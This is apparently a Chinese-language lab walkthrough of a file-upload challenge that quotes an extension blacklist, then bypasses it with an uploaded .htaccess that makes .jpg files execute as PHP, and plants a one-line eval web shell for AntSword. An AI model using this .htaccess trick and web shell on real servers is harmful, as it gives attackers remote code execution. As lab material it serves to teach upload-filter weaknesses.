本次考验的是黑名单绕过,查看禁用的文件如下:
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".
我们可以尝试.htaccess绕过,查看Apache文件存在 AllowOverride All,那么我们可以上传自己构造的恶意htaccess覆盖掉之前的配置文件,从而绕过黑名单限制。
DocumentRoot "C:\phpstudy\WWW"
<Directory />
Options +Indexes +FollowSymLinks +ExecCGI
AllowOverride All
Order allow,deny
Allow from all
Require all granted
</Directory>
首先上传.htaccess文件
创建.htaccess文件,编辑如下
#以下代码目的:
设置所有的jpg格式的文件以php格式执行
<FilesMatch "\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
以下代码目的:设置muma.jpg文件以php格式执行
<FilesMatch "muma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
示例:
上传一个phpinfo,看是否成功:
<?php phpinfo();?>
访问文件地址:
写入一句话木马,修改文件后缀为.jpg:
<?php eval($_REQUEST[123])?>
蚁剑连接: